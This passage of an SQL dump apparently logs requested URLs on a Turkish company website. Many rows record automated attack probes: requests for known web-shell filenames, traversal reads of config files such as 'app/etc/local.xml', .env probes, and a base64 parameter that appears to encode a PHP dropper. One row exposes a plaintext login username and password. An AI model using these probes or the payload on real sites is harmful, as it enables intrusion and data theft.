00:00:00',301),(33290,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/jvk.jpg',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/jvk.jpg','',5,0,'2023-09-17 14:41:18','0000-00-00 00:00:00',301),(33291,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/avb_12.jpg',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/avb_12.jpg','',7,0,'2023-09-17 14:42:08','0000-00-00 00:00:00',301),(33292,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/avb_1.jpg',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/avb_1.jpg','',4,0,'2023-09-17 14:42:34','0000-00-00 00:00:00',301),(33293,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/rh6-400x300.jpg',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/rh6-400x300.jpg','',4,0,'2023-09-17 14:43:25','0000-00-00 00:00:00',301),(33294,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/le40v.jpg',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/le40v.jpg','',4,0,'2023-09-17 23:19:52','0000-00-00 00:00:00',301),(33295,'http://www.3s-technologies.com.tr/en/pksgqhdn.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-18 02:29:59','0000-00-00 00:00:00',301),(33296,'https://www.3s-technologies.com.tr/en/epwacdif.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-18 02:30:00','0000-00-00 00:00:00',301),(33297,'http://www.3s-technologies.com.tr/en/vggzvvgk.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-18 17:08:30','0000-00-00 00:00:00',301),(33298,'https://www.3s-technologies.com.tr/en/npgmhjwo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-09-18 17:08:31','0000-00-00 00:00:00',301),(33299,'http://3s-technologies.com.tr/en//wp-admin/css/colors/blue/blue.php?wall=ciagjgzjid0gj1beoxdhsefnwldob2j5qw5qsej5wlq0bkxuqm9jrjkxym1gdfptz3bmaupjymljdup6egljatgruedadmntmgdiv1ywyuc5a1btsndim04wswlcbgjttjblwejsufnkdgrxedbhwejoy25rdlptoxliuzfrwvhsaelqndhhvzv3zfhrz2ribhdavdbpwm1sc1ptswdibuz0wlqwavgxoglqanhwym5cmwrdqnvzvzfsufnkzklpqjblwejsufnkemrxsnrhwffpsuhaagjivmxqu0pwy0d4dllxuwlqand2wm05ewjung5pmmxts0nszlvfovrwq2w3yvdzb1fhtnzjsgtvsky5r1nveezvmxnuwde4blhwc25krzf3wdi1agjxvw5yu3dnsky5r1nveezvmxnuwde4blhwc25ibuz0wlnkzettbddav05vynlbblqwc25pmzfsykhobguyvmphrzhnsjbwu0p6ddlmvdgrjzskicakzm4gpsandxbsb2fkzxiucghwjzskicbpziggznvuy3rpb25fzxhpc3rzkcdmawxlx3b1df9jb250zw50cycpickgewogicagzmlszv9wdxrfy29udgvudhmojgzulcbiyxnlnjrfzgvjb2rlkcrmyykpowogih1lbhnlewogicagqhrvdwnokcrmbik7ciagicbpzighjgzvid0gzm9wzw4ojgzulcanyscpksb7ciagicagigvjag8gj2vycm9yjzskicagicagzxhpddskicagih07ciagicbmd3jpdguojgzvlcbiyxnlnjrfzgvjb2rlkcrmyykpowogicagzmnsb3nlkcrmbyk7ciagfqogiglmkcbmawxlx2v4axn0cygkzm4pickgewogicagzwnobyanyuryaxy0jzskicagigv4axq7ciagfq==',NULL,'www.google.com','',6,0,'2023-09-18 22:58:35','0000-00-00 00:00:00',301),(33300,'http://3s-technologies.com.tr/tr/wp-includes/ixr/about.php',NULL,'','',157,0,'2023-09-19 01:09:53','0000-00-00 00:00:00',301),(33301,'http://3s-technologies.com.tr/tr/alfanew.php',NULL,'','',304,0,'2023-09-19 01:09:53','0000-00-00 00:00:00',301),(33302,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/utils/about.php',NULL,'','',2,0,'2023-09-19 01:09:54','0000-00-00 00:00:00',301),(33303,'http://3s-technologies.com.tr/tr/wp-p.php7',NULL,'','',69,0,'2023-09-19 01:09:55','0000-00-00 00:00:00',301),(33304,'http://3s-technologies.com.tr/tr/wp-admin/repeater.php',NULL,'','',58,0,'2023-09-19 01:09:56','0000-00-00 00:00:00',301),(33305,'http://3s-technologies.com.tr/tr/wp-includes/repeater.php',NULL,'','',56,0,'2023-09-19 01:09:56','0000-00-00 00:00:00',301),(33306,'http://3s-technologies.com.tr/tr/wp-content/repeater.php',NULL,'','',57,0,'2023-09-19 01:09:57','0000-00-00 00:00:00',301),(33307,'http://3s-technologies.com.tr/tr/wsoyanz.php',NULL,'','',76,0,'2023-09-19 01:09:57','0000-00-00 00:00:00',301),(33308,'http://3s-technologies.com.tr/tr/yanz.php',NULL,'','',150,0,'2023-09-19 01:09:58','0000-00-00 00:00:00',301),(33309,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoo/wsoyanz.php',NULL,'','',71,0,'2023-09-19 01:09:59','0000-00-00 00:00:00',301),(33310,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoo/wsoyanz1.php',NULL,'','',61,0,'2023-09-19 01:10:00','0000-00-00 00:00:00',301),(33311,'http://3s-technologies.com.tr/tr/cache-compat.php',NULL,'','',66,0,'2023-09-19 01:10:00','0000-00-00 00:00:00',301),(33312,'http://3s-technologies.com.tr/tr/ajax-actions.php',NULL,'','',66,0,'2023-09-19 01:10:00','0000-00-00 00:00:00',301),(33313,'http://3s-technologies.com.tr/tr/wp-admin/ajax-actions.php',NULL,'','',56,0,'2023-09-19 01:10:01','0000-00-00 00:00:00',301),(33314,'http://3s-technologies.com.tr/tr/wp-consar.php',NULL,'','',64,0,'2023-09-19 01:10:02','0000-00-00 00:00:00',301),(33315,'http://3s-technologies.com.tr/tr/admin-post.php',NULL,'','',69,0,'2023-09-19 01:10:03','0000-00-00 00:00:00',301),(33316,'http://3s-technologies.com.tr/tr/wp-admin/maint/maint/ajax-actions.php',NULL,'','',54,0,'2023-09-19 01:10:03','0000-00-00 00:00:00',301),(33317,'http://3s-technologies.com.tr/tr/wp-admin/css/index.php',NULL,'','',217,0,'2023-09-19 01:10:04','0000-00-00 00:00:00',301),(33318,'http://3s-technologies.com.tr/tr/about.php7',NULL,'','',69,0,'2023-09-19 01:10:06','0000-00-00 00:00:00',301),(33319,'https://www.3s-technologies.com.tr/geju.php',NULL,'','',2,0,'2023-09-20 03:31:17','0000-00-00 00:00:00',301),(33320,'http://3s-technologies.com.tr/tr/login/login.php?username=stefanval&password=!7a2swhds5t&submit=',NULL,'http://3s-technologies.com.tr/tr/login/login.php?username=StefanVaL&password=%217A2swhds5T&submit=','',3,0,'2023-09-20 10:29:28','0000-00-00 00:00:00',301),(33321,'https://mail.3s-technologies.com.tr/tr/.env',NULL,'','',8,0,'2023-09-20 19:35:26','0000-00-00 00:00:00',301),(33322,'http://3s-technologies.com.tr/tr/wp-content/plugins/1-flash-gallery/readme.txt',NULL,'','',1,0,'2023-09-21 10:58:58','0000-00-00 00:00:00',301),(33323,'https://3s-technologies.com.tr/en/wp-content/plugins/wordpresscore/include.php',NULL,'www.google.com','',14,0,'2023-09-21 19:24:38','0000-00-00 00:00:00',301),(33324,'http://3s-technologies.com.tr/en/wp-includes/images/include.php',NULL,'www.google.com','',9,0,'2023-09-21 19:24:46','0000-00-00 00:00:00',301),(33325,'https://3s-technologies.com.tr/en/wp-includes/widgets/include.php',NULL,'www.google.com','',14,0,'2023-09-21 19:24:53','0000-00-00 00:00:00',301),(33326,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/license.php',NULL,'www.google.com','',4,0,'2023-09-21 20:49:27','0000-00-00 00:00:00',301),(33327,'http://3s-technologies.com.tr/tr/wp-pano.php',NULL,'','',17,0,'2023-09-22 00:18:41','0000-00-00 00:00:00',301),(33328,'http://3s-technologies.com.tr/tr/nf_tracking.php',NULL,'','',24,0,'2023-09-23 01:07:40','0000-00-00 00:00:00',301),(33329,'http://3s-technologies.com.tr/tr/atomlib.php',NULL,'','',384,0,'2023-09-23 01:07:40','0000-00-00 00:00:00',301),(33330,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresscore/include.php',NULL,'','',17,0,'2023-09-23 04:57:30','0000-00-00 00:00:00',301),(33331,'http://3s-technologies.com.tr/wp.php',NULL,'','',3,0,'2023-09-24 08:16:21','0000-00-00 00:00:00',301),(33332,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-mailinglist/css/colorbox.css',NULL,'','',1,0,'2023-09-24 09:15:36','0000-00-00 00:00:00',301),(33333,'http://3s-technologies.com.tr/tr/mxaxxxxxxxk-hxdxamx.php',NULL,'','',2,0,'2023-09-25 06:37:40','0000-00-00 00:00:00',301),(33334,'http://mail.3s-technologies.com.tr/tr/sitemap.xml',NULL,'http://mail.3s-technologies.com.tr/sitemap.xml','',3,0,'2023-09-26 06:14:24','0000-00-00 00:00:00',301),(33335,'http://3s-technologies.com.tr/tr/products.json',NULL,'http://3s-technologies.com.tr/products.json','',4,0,'2023-09-26 06:19:31','0000-00-00 00:00:00',301),(33336,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.css',NULL,'','',1,0,'2023-09-27 03:29:47','0000-00-00 00:00:00',301),(33337,'http://3s-technologies.com.tr/tr/wp-content/plugins/tevolution/tmplconnector/monetize/templatic-custom_fields/css/jquery.lightbox-0.5.css',NULL,'','',1,0,'2023-09-28 09:05:29','0000-00-00 00:00:00',301),(33338,'http://3s-technologies.com.tr/tr/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/index.css',NULL,'','',1,0,'2023-09-30 02:47:02','0000-00-00 00:00:00',301),(33339,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wordpresscore/include.php',NULL,'www.google.com','',4,0,'2023-09-30 23:41:34','0000-00-00 00:00:00',301),(33340,'http://3s-technologies.com.tr/tr/wp-admin/xl2023.php',NULL,'','',3,0,'2023-10-02 06:54:03','0000-00-00 00:00:00',301),(33341,'http://3s-technologies.com.tr/tr/wp-includes/xl2023.php',NULL,'','',3,0,'2023-10-02 06:54:04','0000-00-00 00:00:00',301),(33342,'https://www.3s-technologies.com.tr/tr/ deterjan kimyasal yıkama',NULL,'','',1,0,'2023-10-02 11:16:57','0000-00-00 00:00:00',301),(33343,'http://3s-technologies.com.tr/en/wp2/wp-includes/css/admin-bar-rtl.css',NULL,'3s-technologies.com.tr','',1,0,'2023-10-02 18:45:26','0000-00-00 00:00:00',301),(33344,'http://3s-technologies.com.tr/en/site/wp-includes/css/admin-bar-rtl.css',NULL,'3s-technologies.com.tr','',1,0,'2023-10-02 18:46:57','0000-00-00 00:00:00',301),(33345,'http://3s-technologies.com.tr/en/sito/wp-includes/css/admin-bar-rtl.css',NULL,'3s-technologies.com.tr','',1,0,'2023-10-02 18:47:44','0000-00-00 00:00:00',301),(33346,'http://3s-technologies.com.tr/en/cms/wp-includes/css/admin-bar-rtl.css',NULL,'3s-technologies.com.tr','',1,0,'2023-10-02 18:49:19','0000-00-00 00:00:00',301),(33347,'http://3s-technologies.com.tr/en/media/wp-includes/css/admin-bar-rtl.css',NULL,'3s-technologies.com.tr','',1,0,'2023-10-02 18:49:22','0000-00-00 00:00:00',301),(33348,'http://3s-technologies.com.tr/tr/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php',NULL,'','',1,0,'2023-10-03 03:28:50','0000-00-00 00:00:00',301),(33349,'http://3s-technologies.com.tr/tr/wp-content/themes/include.php',NULL,'','',62,0,'2023-10-03 13:51:04','0000-00-00 00:00:00',301),(33350,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore/include.php',NULL,'','',61,0,'2023-10-03 13:51:05','0000-00-00 00:00:00',301),(33351,'http://3s-technologies.com.tr/tr/wp-includes/widgets/include.php',NULL,'','',38,0,'2023-10-03 13:51:06','0000-00-00 00:00:00',301),(33352,'http://3s-technologies.com.tr/tr/wp-includes/images/include.php',NULL,'','',42,0,'2023-10-03 13:51:07','0000-00-00 00:00:00',301),(33353,'http://3s-technologies.com.tr/tr/wp-content/plugins/include.php',NULL,'','',3,0,'2023-10-03 13:51:08','0000-00-00 00:00:00',301),(33354,'http://3s-technologies.com.tr/tr/wp-content/plugins/topxoh/xleetseller85.php',NULL,'','',1,0,'2023-10-04 06:46:30','0000-00-00 00:00:00',301),(33355,'http://3s-technologies.com.tr/tr/fm1.php',NULL,'','',50,0,'2023-10-04 06:46:36','0000-00-00 00:00:00',301),(33356,'http://3s-technologies.com.tr/tr/million.php',NULL,'','',9,0,'2023-10-04 06:46:38','0000-00-00 00:00:00',301),(33357,'http://3s-technologies.com.tr/tr/wp-includes/blocks/calendar/updates.php',NULL,'','',3,0,'2023-10-04 06:46:39','0000-00-00 00:00:00',301),(33358,'http://3s-technologies.com.tr/tr/wp-includes/random_compat/about.php',NULL,'','',33,0,'2023-10-04 06:46:40','0000-00-00 00:00:00',301),(33359,'http://3s-technologies.com.tr/tr/indx.php',NULL,'','',1,0,'2023-10-04 06:46:42','0000-00-00 00:00:00',301),(33360,'http://3s-technologies.com.tr/tr/wp-ruucha.php7',NULL,'','',1,0,'2023-10-04 06:46:45','0000-00-00 00:00:00',301),(33361,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag/db.php',NULL,'','',115,0,'2023-10-04 06:46:54','0000-00-00 00:00:00',301),(33362,'http://3s-technologies.com.tr/tr/wp-head.php',NULL,'','',112,0,'2023-10-04 06:46:57','0000-00-00 00:00:00',301),(33363,'http://3s-technologies.com.tr/tr/wp-includes/fresh1.php',NULL,'','',1,0,'2023-10-04 06:47:18','0000-00-00 00:00:00',301),(33364,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/about.php',NULL,'','',121,0,'2023-10-04 06:47:22','0000-00-00 00:00:00',301),(33365,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/plugins.php',NULL,'','',19,0,'2023-10-04 06:47:25','0000-00-00 00:00:00',301),(33366,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/db.php',NULL,'','',79,0,'2023-10-04 06:47:39','0000-00-00 00:00:00',301),(33367,'http://3s-technologies.com.tr/tr/wp-includes/text/about.php',NULL,'','',161,0,'2023-10-04 06:47:50','0000-00-00 00:00:00',301),(33368,'http://3s-technologies.com.tr/tr/wp-content/uploads/elementor/css/class_api.php',NULL,'','',1,0,'2023-10-04 06:47:53','0000-00-00 00:00:00',301),(33369,'http://3s-technologies.com.tr/tr/wp-includes/requests/about.php',NULL,'','',170,0,'2023-10-04 06:47:55','0000-00-00 00:00:00',301),(33370,'http://3s-technologies.com.tr/tr/wp-includes/requests/index.php',NULL,'','',19,0,'2023-10-04 06:48:01','0000-00-00 00:00:00',301),(33371,'http://3s-technologies.com.tr/tr/wp-includes/widgets/about.php',NULL,'','',148,0,'2023-10-04 06:48:08','0000-00-00 00:00:00',301),(33372,'http://3s-technologies.com.tr/tr/wp-includes/themes.php',NULL,'','',35,0,'2023-10-04 06:48:23','0000-00-00 00:00:00',301),(33373,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/index.php',NULL,'','',98,0,'2023-10-04 06:48:29','0000-00-00 00:00:00',301),(33374,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/about.php',NULL,'','',13,0,'2023-10-04 06:48:37','0000-00-00 00:00:00',301),(33375,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/wp-crons.wp-admin/css/colors/blue/wp-crons.php',NULL,'','',4,0,'2023-10-04 06:49:17','0000-00-00 00:00:00',301),(33376,'http://3s-technologies.com.tr/tr/wp-includes/css/about.php',NULL,'','',92,0,'2023-10-04 06:49:27','0000-00-00 00:00:00',301),(33377,'http://3s-technologies.com.tr/tr/wp-content/themes/twenty/twenty.php',NULL,'','',57,0,'2023-10-04 06:49:34','0000-00-00 00:00:00',301),(33378,'http://3s-technologies.com.tr/tr/wp-content/plugins/ioptimization/ioptimize.php',NULL,'','',7,0,'2023-10-04 06:49:46','0000-00-00 00:00:00',301),(33379,'http://3s-technologies.com.tr/tr/.well-known/class.api.php',NULL,'','',2,0,'2023-10-04 06:49:49','0000-00-00 00:00:00',301),(33380,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/class_api.php',NULL,'','',4,0,'2023-10-04 06:49:55','0000-00-00 00:00:00',301),(33381,'http://3s-technologies.com.tr/tr/wp-content/plugins/about.php',NULL,'','',160,0,'2023-10-04 06:49:58','0000-00-00 00:00:00',301),(33382,'http://3s-technologies.com.tr/tr/ioxi-rex4.php7',NULL,'','',11,0,'2023-10-04 06:49:59','0000-00-00 00:00:00',301),(33383,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.css',NULL,'','',1,0,'2023-10-05 06:58:39','0000-00-00 00:00:00',301),(33384,'http://3s-technologies.com.tr/register',NULL,'','',3,0,'2023-10-05 07:12:13','0000-00-00 00:00:00',301),(33385,'http://3s-technologies.com.tr/tr/vendor/laravel-filemanager/js/filemanager.js',NULL,'','',1,0,'2023-10-05 07:12:14','0000-00-00 00:00:00',301),(33386,'http://3s-technologies.com.tr/tr/laravel-filemanager/js/filemanager.js',NULL,'','',1,0,'2023-10-05 07:12:16','0000-00-00 00:00:00',301),(33387,'http://3s-technologies.com.tr/en/++++++++++++++++++++++++++++++++/',NULL,'http://3s-technologies.com.tr/en/++++++++++++++++++++++++++++++++/','',2,0,'2023-10-07 16:54:49','0000-00-00 00:00:00',301),(33388,'http://3s-technologies.com.tr/en/app/etc/local.xml',NULL,'','',2,0,'2023-10-09 07:29:09','0000-00-00 00:00:00',301),(33389,'http://3s-technologies.com.tr/en/amfeed/main/download?file=../../../app/etc/local.xml',NULL,'','',1,0,'2023-10-09 07:29:10','0000-00-00 00:00:00',301),(33390,'http://3s-technologies.com.tr/en/magmi-importer/web/download_file.php?file=../../app/etc/local.xml',NULL,'','',2,0,'2023-10-09 07:29:11','0000-00-00 00:00:00',301),(33391,'http://3s-technologies.com.tr/en/magmi/web/download_file.php?file=../../app/etc/local.xml',NULL,'','',2,0,'2023-10-09 07:29:12','0000-00-00 00:00:00',301),(33392,'http://3s-technologies.com.tr/en/magmi-importer/conf/magmi.ini',NULL,'','',1,0,'2023-10-09 07:29:13','0000-00-00 00:00:00',301),(33393,'http://3s-technologies.com.tr/en/magmi/conf/magmi.ini',NULL,'','',1,0,'2023-10-09 07:29:13','0000-00-00 00:00:00',301),(33394,'http://3s-technologies.com.tr/en/var/cache/mage--2',NULL,'','',6,0,'2023-10-09 07:29:14','0000-00-00 00:00:00',301),(33395,'http://3s-technologies.com.tr/en/var/resource_config.json',NULL,'','',6,0,'2023-10-09 07:29:15','0000-00-00 00:00:00',301),(33396,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/dalga-lehim/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-10-09 18:22:53','0000-00-00 00:00:00',301),(33397,'https://3s-technologies.com.tr/tr/feed',NULL,'','',1,0,'2023-10-10 23:17:06','0000-00-00 00:00:00',301),(33398,'http://3s-technologies.com.tr/tr/rss',NULL,'','',1,0,'2023-10-10 23:17:26','0000-00-00 00:00:00',301),(33399,'https://3s-technologies.com.tr/tr/rss',NULL,'','',1,0,'2023-10-10 23:17:31','0000-00-00 00:00:00',301),(33400,'http://3s-technologies.com.tr/tr/assets/upload_image.php',NULL,'','',1,0,'2023-10-13 04:11:49','0000-00-00 00:00:00',301),(33401,'http://3s-technologies.com.tr/en/ayk.php',NULL,'','',3,0,'2023-10-14 05:28:35','0000-00-00 00:00:00',301),(33402,'http://3s-technologies.com.tr/en/geju.php',NULL,'','',5,0,'2023-10-14 05:28:36','0000-00-00 00:00:00',301),(33403,'http://3s-technologies.com.tr/tr/:{mod_djimageslider}',NULL,'http://3s-technologies.com.tr/tr/:%7Bmod_djimageslider%7D','',1,0,'2023-10-15 12:01:38','0000-00-00 00:00:00',301),(33404,'http://www.3s-technologies.com.tr/en/wp-includes/wlwmanifest.xml',NULL,'www.google.com','',1,0,'2023-10-15 17:25:03','0000-00-00 00:00:00',301),(33405,'http://3s-technologies.com.tr/tr/hhhknt-an9awlbkhhh.php',NULL,'','',1,0,'2023-10-16 10:25:56','0000-00-00 00:00:00',301),(33406,'http://3s-technologies.com.tr/tr/wp-content/plugins/royal-elementor-addons/assets/js/modal-popups.js',NULL,'','',1,0,'2023-10-16 21:49:24','0000-00-00 00:00:00',301),(33407,'http://3s-technologies.com.tr/en/plugins/editors/jckeditor/jckeditor.xml',NULL,'','',1,0,'2023-10-17 06:19:20','0000-00-00 00:00:00',301),(33408,'http://3s-technologies.com.tr/en/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=',NULL,'','',1,0,'2023-10-17 06:19:21','0000-00-00 00:00:00',301),(33409,'https://www.3s-technologies.com.tr/wp-admin/admin-ajax.php',NULL,'','',2,0,'2023-10-17 08:06:23','0000-00-00 00:00:00',301),(33410,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/revslider/temp/update_extract/revslider/wp.php',NULL,'','',1,0,'2023-10-17 08:06:24','0000-00-00 00:00:00',301),(33411,'https://www.3s-technologies.com.tr/wp-admin/admin.php?page=levoslideshow_manage',NULL,'','',1,0,'2023-10-17 08:06:24','0000-00-00 00:00:00',301),(33412,'https://www.3s-technologies.com.tr/wp-content/plugins/formcraft/file-upload/server/php/',NULL,'','',1,0,'2023-10-17 08:06:24','0000-00-00 00:00:00',301),(33413,'https://www.3s-technologies.com.tr/wp-admin/admin.php?page=blaze_manage',NULL,'','',1,0,'2023-10-17 08:06:25','0000-00-00 00:00:00',301),(33414,'https://www.3s-technologies.com.tr/wp-admin/admin.php?page=catpro_manage',NULL,'','',1,0,'2023-10-17 08:06:25','0000-00-00 00:00:00',301),(33415,'https://www.3s-technologies.com.tr/wp-content/plugins/cherry-plugin/admin/import-export/upload.php',NULL,'','',1,0,'2023-10-17 08:06:26','0000-00-00 00:00:00',301),(33416,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/cherry-plugin/admin/import-export/wp.php',NULL,'','',1,0,'2023-10-17 08:06:26','0000-00-00 00:00:00',301),(33417,'https://www.3s-technologies.com.tr/wp-admin/admin.php?page=powerzoomer_manage',NULL,'','',1,0,'2023-10-17 08:06:27','0000-00-00 00:00:00',301),(33418,'https://www.3s-technologies.com.tr/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php',NULL,'','',1,0,'2023-10-17 08:06:27','0000-00-00 00:00:00',301),(33419,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/simple-ads-manager/wp.php',NULL,'','',1,0,'2023-10-17 08:06:28','0000-00-00 00:00:00',301),(33420,'https://www.3s-technologies.com.tr/wp-admin/admin.php?page=slideshowpro_manage',NULL,'','',1,0,'2023-10-17 08:06:28','0000-00-00 00:00:00',301),(33421,'https://www.3s-technologies.com.tr/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'','',1,0,'2023-10-17 08:06:29','0000-00-00 00:00:00',301),(33422,'https://www.3s-technologies.com.tr/tr/wp-content/uploads/wysija/themes/wp.php',NULL,'','',1,0,'2023-10-17 08:06:29','0000-00-00 00:00:00',301),(33423,'https://www.3s-technologies.com.tr/wp-content/plugins/dzs-zoomsounds/admin/upload.php',NULL,'','',1,0,'2023-10-17 08:06:30','0000-00-00 00:00:00',301),(33424,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/dzs-zoomsounds/admin/upload/wp.php',NULL,'','',1,0,'2023-10-17 08:06:30','0000-00-00 00:00:00',301),(33425,'https://www.3s-technologies.com.tr/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php',NULL,'','',1,0,'2023-10-17 08:06:31','0000-00-00 00:00:00',301),(33426,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/sexy-contact-form/includes/fileupload/files/wp.php',NULL,'','',1,0,'2023-10-17 08:06:32','0000-00-00 00:00:00',301),(33427,'https://www.3s-technologies.com.tr/wp-content/plugins/php-event-calendar/server/file-uploader/',NULL,'','',1,0,'2023-10-17 08:06:32','0000-00-00 00:00:00',301),(33428,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/php-event-calendar/server/file-uploader/wp.php',NULL,'','',1,0,'2023-10-17 08:06:33','0000-00-00 00:00:00',301),(33429,'https://www.3s-technologies.com.tr/wp-content/themes/synoptic/lib/avatarupload/upload.php',NULL,'','',1,0,'2023-10-17 08:06:33','0000-00-00 00:00:00',301),(33430,'https://www.3s-technologies.com.tr/tr/wp-content/uploads/markets/avatars/wp.php',NULL,'','',1,0,'2023-10-17 08:06:34','0000-00-00 00:00:00',301),(33431,'https://www.3s-technologies.com.tr/wp-content/plugins/wpshop/includes/ajax.php?elementcode=ajaxupload',NULL,'','',1,0,'2023-10-17 08:06:34','0000-00-00 00:00:00',301),(33432,'https://www.3s-technologies.com.tr/tr/wp-content/uploads/wp.php',NULL,'','',1,0,'2023-10-17 08:06:35','0000-00-00 00:00:00',301),(33433,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/showbiz/temp/update_extract/showbiz/wp.php',NULL,'','',1,0,'2023-10-17 08:06:36','0000-00-00 00:00:00',301),(33434,'https://www.3s-technologies.com.tr/tr/?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload',NULL,'','',1,0,'2023-10-17 08:06:37','0000-00-00 00:00:00',301),(33435,'https://www.3s-technologies.com.tr/tr/images/stories/test.php',NULL,'','',1,0,'2023-10-17 08:06:38','0000-00-00 00:00:00',301),(33436,'https://www.3s-technologies.com.tr/tr/images/stories/test.php.gif',NULL,'','',1,0,'2023-10-17 08:06:39','0000-00-00 00:00:00',301),(33437,'https://www.3s-technologies.com.tr/tr/images/stories/test.php3.gif',NULL,'','',1,0,'2023-10-17 08:06:40','0000-00-00 00:00:00',301),(33438,'https://www.3s-technologies.com.tr/tr/images/jdownloads/screenshots/test.php.i',NULL,'','',1,0,'2023-10-17 08:06:43','0000-00-00 00:00:00',301),(33439,'https://www.3s-technologies.com.tr/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2023-10-17 08:06:52','0000-00-00 00:00:00',301),(33440,'https://www.3s-technologies.com.tr/tr/administrator/components/com_bt_portfolio/test.php',NULL,'','',1,0,'2023-10-17 08:06:53','0000-00-00 00:00:00',301),(33441,'https://www.3s-technologies.com.tr/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2023-10-17 08:06:53','0000-00-00 00:00:00',301),(33442,'https://www.3s-technologies.com.tr/tr/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/test.php',NULL,'','',1,0,'2023-10-17 08:06:54','0000-00-00 00:00:00',301),(33443,'https://www.3s-technologies.com.tr/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2023-10-17 08:06:54','0000-00-00 00:00:00',301),(33444,'https://www.3s-technologies.com.tr/tr/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/test.php',NULL,'','',1,0,'2023-10-17 08:06:55','0000-00-00 00:00:00',301),(33445,'https://www.3s-technologies.com.tr/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2023-10-17 08:06:55','0000-00-00 00:00:00',301),(33446,'https://www.3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/tmp-upload-images/test.php',NULL,'','',1,0,'2023-10-17 08:06:56','0000-00-00 00:00:00',301),(33447,'https://www.3s-technologies.com.tr/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2023-10-17 08:06:57','0000-00-00 00:00:00',301),(33448,'https://www.3s-technologies.com.tr/tr/administrator/components/com_maian15/charts/tmp-upload-images/test.php',NULL,'','',1,0,'2023-10-17 08:06:57','0000-00-00 00:00:00',301),(33449,'https://www.3s-technologies.com.tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2023-10-17 08:06:58','0000-00-00 00:00:00',301),(33450,'https://www.3s-technologies.com.tr/tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/tmp-upload-images/test.php',NULL,'','',1,0,'2023-10-17 08:06:58','0000-00-00 00:00:00',301),(33451,'https://www.3s-technologies.com.tr/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=test.php',NULL,'','',1,0,'2023-10-17 08:06:59','0000-00-00 00:00:00',301),(33452,'https://www.3s-technologies.com.tr/tr/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/test.php',NULL,'','',1,0,'2023-10-17 08:07:00','0000-00-00 00:00:00',301),(33453,'http://3s-technologies.com.tr/tr/wp-content/plugins/acf-frontend-display/js/blueimp-jquery-file-upload-d45deb1/js/main.js',NULL,'','',1,0,'2023-10-17 11:00:57','0000-00-00 00:00:00',301),(33454,'https://www.3s-technologies.com.tr/tr/nf_tracking.php',NULL,'','',1,0,'2023-10-18 03:30:33','0000-00-00 00:00:00',301),(33455,'https://www.3s-technologies.com.tr/tr/simple.php',NULL,'','',2,0,'2023-10-18 03:31:11','0000-00-00 00:00:00',301),(33456,'http://3s-technologies.com.tr/tr/wp-content/themes/themify-ultra/style.css',NULL,'','',2,0,'2023-10-19 21:32:40','0000-00-00 